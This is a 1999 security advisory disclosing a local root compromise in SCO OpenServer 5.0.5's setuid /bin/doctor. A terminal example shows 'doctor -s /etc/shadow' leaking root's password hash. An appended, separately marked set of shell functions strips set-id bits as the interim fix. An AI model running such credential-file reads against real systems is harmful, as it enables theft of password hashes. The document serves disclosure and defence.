SCO OpenServer 5.0.5 /bin/doctor root compromise


Date: Tue, 7 Sep 1999 10:44:42 -0500
From: Brock Tellier <[email protected]>
To: [email protected]
Subject: SCO OpenServer 5.0.5 /bin/doctor root compromise

Greetings,


INFO:
 There is a local root compromise in SCO 5.0.5's /bin/doctor 2.0.0e2 and
probably others.  By supplying a doctor script file you can read the
first partial line of any file on the system (good enough for
/etc/shadow).  Example:

scobox:/bin$ id
uid=136(btellier),200(users)
scobox:/bin$ uname -a
SCO_SV scobox 3.2 5.0.5 i386
scobox:/bin$ doctor -V
doctor 2.0.0e 2
scobox:/bin$ doctor -s /etc/shadow
doctor: WARNING User message: invalid command name "root:xbfOLR0ekXN/o:10656::"
scobox:/bin$

And so on.

FIX:
 Just chmod -s until SCO comes out with a fix.  Although I certainly
won't be changing it back to suid root anytime soon.  If a hole like
this exists, there are undoubtedly countless more lurking within.

Brock Tellier
Systems Administrator
Webley Systems
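
The interim fix from the message above (chmod -s), as an added example that is not part of the original post and not SCO's code: POSIX shell functions that inventory set-id files, strip the bits from anything not on an allowlist, and verify the result. The function names and the allowlist file (one absolute path per line) are assumptions made for this example.

```shell
#!/bin/sh
# Added example: inventory set-id binaries and apply the "chmod -s" mitigation.
# Usage (as root), e.g.:  strip_setid /bin/doctor
#                         audit_dir /bin /root/setid.allow   # hypothetical allowlist path

# Print every regular file under directory $1 that has setuid or setgid set.
list_setid() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
}

# Remove setuid and setgid from file $1, then confirm they are really gone.
# Returns 0 if the file ends up without set-id bits, 1 if the change failed,
# 2 if $1 is not a regular file.
strip_setid() {
    target=$1
    [ -f "$target" ] || { echo "skip: $target is not a regular file" >&2; return 2; }
    if [ -u "$target" ] || [ -g "$target" ]; then
        ls -l "$target" >&2              # keep a record of the old mode and owner
        chmod u-s,g-s "$target" || return 1
    fi
    if [ -u "$target" ] || [ -g "$target" ]; then
        echo "FAIL: $target is still set-id" >&2
        return 1
    fi
    echo "ok: $target has no set-id bits"
}

# Strip set-id bits from every file under $1 whose exact path is not listed
# in allowlist file $2. Allowlisted files are reported and left untouched.
audit_dir() {
    list_setid "$1" | while IFS= read -r f; do
        if grep -Fqx -- "$f" "$2"; then
            echo "keep: $f"
        else
            strip_setid "$f"
        fi
    done
}
```

After the change, a second list_setid run over the same directory should show only the allowlisted paths; anything else that reappears was restored by a package update or patch and needs reviewing again.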

